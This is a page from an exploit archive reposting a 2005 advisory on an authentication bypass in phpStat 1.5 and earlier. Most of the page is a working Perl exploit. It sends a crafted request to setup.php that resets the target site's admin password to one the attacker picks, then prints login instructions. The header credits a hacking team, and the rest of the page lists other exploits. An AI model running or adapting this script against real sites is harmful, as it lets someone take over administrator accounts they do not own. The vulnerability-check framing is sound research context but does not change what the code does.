首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpStat Authentication Bypass Vulnerability
来源:AlphaST.Com 作者:Sirus-v 发布时间:2005-06-01  

phpStat Authentication Bypass Vulnerability (Exploit, Setup.PHP)

Summary
phpStat is an "IM statistics generator, made using PHP. Along basic statistics it also organizes conversations for future access by their rightful owners."

phpStat is vulnerable to an authentication bypass vulnerability, the following exploit allows you to verify whether your system is vulnerable to the vulnerability or not.

Credit:
The information has been provided by A l p h a _ P r o g r a m m e r ( Sirus-v ).

Details
Vulnerable Systems:
* phpStat version 1.5 and prior

Exploit:
#!/usr/bin/perl
###################################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
###################################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
###################################
# Gr33tz To => mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
###################################


use IO::Socket;

if (@ARGV < 3)
{
print "\n=====================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "=====================\n\n";
print "Examples:\n\n";
print " phpStat.pl www.Site.com /phpstat/ 12345\n";
exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";

print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ethereal <= 0.10.10 SIP Pro
·IBM AIX invscout Local Exploit
·Microsoft Windows COM Structur
·MyBulletinBoard(MyBB) SQL Inje
·Zeroboard 4.x preg_replace Rem
·myBloggie SQL Injection
·Meteor FTP Server Buffer Overf
·e-Post SPA-PRO Mail Service Bu
·Exim Buffer Overflow Exploit
·ePSXe Local Stack Overflow
·Linux Cryptoloop Watermark Exp
·CrobFTP Remote Stack Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved